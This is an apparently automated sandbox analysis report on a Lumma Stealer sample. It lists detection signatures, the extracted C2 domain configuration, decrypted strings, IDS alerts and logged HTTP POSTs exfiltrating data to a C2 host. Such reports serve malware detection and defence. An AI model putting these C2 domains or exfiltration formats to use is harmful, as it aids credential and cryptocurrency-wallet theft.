Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe.10.exe

Overview

General Information

Sample name:random.exe.10.exe
Analysis ID:1577461
MD5:afd936e441bf5cbdb858e96833cc6ed3
SHA1:3491edd8c7caf9ae169e21fb58bccd29d95aefef
SHA256:c6491d7a6d70c7c51baca7436464667b4894e4989fa7c5e05068dde4699e1cbf
Tags:bulletproofexeuser-abus3reports
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • random.exe.10.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\random.exe.10.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
    • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • random.exe.10.exe (PID: 7908 cmdline: "C:\Users\user\Desktop\random.exe.10.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["aspecteirs.lat", "discokeyus.lat", "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "pancakedipyps.click", "energyaffai.lat"], "Build id": "FATE99--test"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.1611561835.0000000000E04000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.1611809499.0000000000E08000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: random.exe.10.exe PID: 7908JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: random.exe.10.exe PID: 7908JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: random.exe.10.exe PID: 7908JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T13:49:47.532709+010020283713Unknown Traffic192.168.2.949712104.21.23.76443TCP
                2024-12-18T13:49:49.654760+010020283713Unknown Traffic192.168.2.949713104.21.23.76443TCP
                2024-12-18T13:49:52.808637+010020283713Unknown Traffic192.168.2.949714104.21.23.76443TCP
                2024-12-18T13:49:55.191760+010020283713Unknown Traffic192.168.2.949715104.21.23.76443TCP
                2024-12-18T13:49:57.766463+010020283713Unknown Traffic192.168.2.949716104.21.23.76443TCP
                2024-12-18T13:50:00.723890+010020283713Unknown Traffic192.168.2.949719104.21.23.76443TCP
                2024-12-18T13:50:03.335163+010020283713Unknown Traffic192.168.2.949721104.21.23.76443TCP
                2024-12-18T13:50:09.275190+010020283713Unknown Traffic192.168.2.949723104.21.23.76443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T13:49:48.399248+010020546531A Network Trojan was detected192.168.2.949712104.21.23.76443TCP
                2024-12-18T13:49:50.616047+010020546531A Network Trojan was detected192.168.2.949713104.21.23.76443TCP
                2024-12-18T13:50:11.969055+010020546531A Network Trojan was detected192.168.2.949723104.21.23.76443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T13:49:48.399248+010020498361A Network Trojan was detected192.168.2.949712104.21.23.76443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T13:49:50.616047+010020498121A Network Trojan was detected192.168.2.949713104.21.23.76443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T13:50:01.494584+010020480941Malware Command and Control Activity Detected192.168.2.949719104.21.23.76443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["aspecteirs.lat", "discokeyus.lat", "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "pancakedipyps.click", "energyaffai.lat"], "Build id": "FATE99--test"}
                Source: random.exe.10.exeReversingLabs: Detection: 73%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pancakedipyps.click
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: FATE99--test
                Source: random.exe.10.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49723 version: TLS 1.2
                Source: random.exe.10.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: number of queries: 1001
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00EA36A9 FindFirstFileExW,0_2_00EA36A9
                Source: C:\Users\user\Desktop\random.exe.10.exeCode function: 0_2_00EA375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00EA375A

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49713 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49713 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49712 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49712 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49719 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49723 -> 104.21.23.76:443
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: pancakedipyps.click
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Joe Sandbox ViewIP Address: 104.21.23.76 104.21.23.76
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49716 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49713 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49712 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49714 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49715 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49719 -> 104.21.23.76:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49721 -> 104.21.23.76:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: pancakedipyps.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EKLZN1L1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12784Host: pancakedipyps.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RLMLEXFN40IEXJDRLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15056Host: pancakedipyps.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FI5E5W32HIHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20536Host: pancakedipyps.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VOGS9FMXKWB6KHV3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: pancakedipyps.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SGY5F9G8KXVCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 547865Host: pancakedipyps.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: pancakedipyps.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: random.exe.10.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: random.exe.10.exe, 00000003.00000002.1738560783.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: random.exe.10.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                Source: random.exe.10.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: random.exe.10.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                Source: random.exe.10.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: random.exe.10.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                Source: random.exe.10.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: random.exe.10.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                Source: random.exe.10.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                Source: random.exe.10.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: random.exe.10.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: random.exe.10.exe, random.exe.10.exe, 00000003.00000003.1556346819.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1697099979.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1738037021.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580204789.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1581457141.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580105512.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1557069609.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580349074.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738879819.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1651202964.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1651102094.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737376014.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1612223125.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1556181740.0000000003707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                Source: random.exe.10.exe, 00000003.00000003.1555532464.0000000003707000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1555702012.0000000003707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/X
                Source: random.exe.10.exe, 00000003.00000003.1611667001.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580204789.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1581457141.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738812681.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1611774091.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1634305646.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1611863813.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737890040.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1611755617.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                Source: random.exe.10.exe, 00000003.00000003.1578903064.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1579093508.000000000370F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiF
                Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api
                Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/apiV
                Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/apihs
                Source: random.exe.10.exeString found in binary or memory: https://sectigo.com/CPS0
                Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
